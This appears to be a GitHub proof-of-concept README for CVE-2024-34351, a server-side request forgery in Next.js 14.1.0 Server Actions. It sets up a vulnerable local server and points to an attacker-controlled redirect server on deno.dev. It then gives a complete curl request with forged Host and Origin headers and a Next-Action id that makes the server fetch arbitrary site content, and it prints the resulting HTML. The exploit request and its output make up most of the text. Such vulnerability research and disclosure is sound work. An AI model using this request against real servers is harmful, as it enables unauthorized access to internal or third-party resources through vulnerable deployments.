- Next.js Server-Side Request Forgery in Server Actions · CVE-2024-34351 · GitHub Advisory Database
- Digging for SSRF in NextJS apps
Attacker can get any website content from Next.js server using CVE-2024-34351 vulnerability:
This Next.js(next@14.1.0
) server has vulnerable redirect
action.
nextjs-CVE-2024-34351/src/app/actions.ts
Lines 5 to 8 in 687c1ff
This vulnerability is fixed in next@14.1.1
.
Start Next.js server which uses next@14.1.0
.
npm install
npm run dev
Attacker need to prepare a redirect sever for sniffing.
- Source: attacker-server/main.ts
https://nextjs-cve-2024-34351.deno.dev/
is prepared for this PoC.
Finally, attacker can fetch from the Next.js server to any website content using SSRF vulnerability.
- Add
Host
header to attacker server - Change
Origin
header to attacker server
curl 'http://localhost:3000/' \
-H 'Host: nextjs-cve-2024-34351.deno.dev' \
-H 'Accept: text/x-component' \
-H 'Accept-Language: ja,en-US;q=0.9,en;q=0.8' \
-H 'Cache-Control: no-cache' \
-H 'Connection: keep-alive' \
-H 'Content-Type: text/plain;charset=UTF-8' \
-H 'Next-Action: 1529e716c9db41d5ce462b285ea3d42d09292bd2' \
-H 'Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%5D%7D%2Cnull%2Cnull%2Ctrue%5D' \
-H 'Origin: http://nextjs-cve-2024-34351.deno.dev' \
-H 'Pragma: no-cache' \
-H 'Referer: http://localhost:3000/' \
-H 'Sec-Fetch-Dest: empty' \
-H 'Sec-Fetch-Mode: cors' \
-H 'Sec-Fetch-Site: same-origin' \
-H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36' \
-H 'sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"' \
-H 'sec-ch-ua-mobile: ?0' \
-H 'sec-ch-ua-platform: "macOS"' \
--data-raw '[]'
<!doctype html>
<html>
<head>
<title>Example Domain</title>
<meta charset="utf-8" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<style type="text/css">
body {
background-color: #f0f0f2;
margin: 0;
padding: 0;
font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
}
div {
width: 600px;
margin: 5em auto;
padding: 2em;
background-color: #fdfdff;
border-radius: 0.5em;
box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
}
a:link, a:visited {
color: #38488f;
text-decoration: none;
}
@media (max-width: 700px) {
div {
margin: 0 auto;
width: auto;
}
}
</style>
</head>
<body>
<div>
<h1>Example Domain</h1>
<p>This domain is for use in illustrative examples in documents. You may use this
domain in literature without prior coordination or asking for permission.</p>
<p><a href="https://www.iana.org/domains/example">More information...</a></p>
</div>
</body>
</html>